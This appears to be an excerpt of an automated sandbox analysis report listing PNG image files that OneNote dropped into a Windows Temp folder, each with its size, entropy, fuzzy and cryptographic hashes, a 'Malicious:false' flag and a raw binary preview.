                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{592BA7D2-11DF-499C-B321-93335149D3F4}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19235
                                                                                                                                                    Entropy (8bit):7.944867159042578
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                    MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                    SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                    SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                    SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{5C66C960-C533-4858-B269-049115105359}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.950380155401321
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                    MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                    SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                    SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                    SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{5D058A82-29B4-46DD-903B-59E5CC7089AB}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11449
                                                                                                                                                    Entropy (8bit):7.91552812501629
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                    MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                    SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                    SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                    SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{5E5FC786-060F-4AE1-B290-184184093952}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19235
                                                                                                                                                    Entropy (8bit):7.944867159042578
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                    MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                    SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                    SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                    SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{609777D3-B74F-4990-89DE-F84B440DC8F2}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11449
                                                                                                                                                    Entropy (8bit):7.91552812501629
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                    MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                    SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                    SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                    SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{62BE44C8-C234-4F4D-AB94-D581F1FC9DB2}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14458
                                                                                                                                                    Entropy (8bit):7.944094738048628
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                    MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                    SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                    SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                    SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{62E48AF2-A111-4F81-90A5-2E7F22FC0E19}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2232
                                                                                                                                                    Entropy (8bit):7.837610270261933
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                    MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                    SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                    SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                    SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{63C4FC4A-57CF-466A-8908-8FB627C644A2}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5386
                                                                                                                                                    Entropy (8bit):7.943706538857394
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                    MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                    SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                    SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                    SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{64444716-09CF-4B8E-9056-C3866ABC232D}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4190
                                                                                                                                                    Entropy (8bit):7.94161730428269
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                    MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                    SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                    SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                    SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{65924EE9-BD13-4DDE-A74A-101DA5B21B97}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2232
                                                                                                                                                    Entropy (8bit):7.837610270261933
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                    MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                    SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                    SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                    SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{65DEF586-789B-463D-B21C-382D57F5C674}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{6642D17A-3B38-4103-97C0-7263984300B4}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11886
                                                                                                                                                    Entropy (8bit):7.946442244439929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                    MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                    SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                    SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                    SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                    Malicious:false
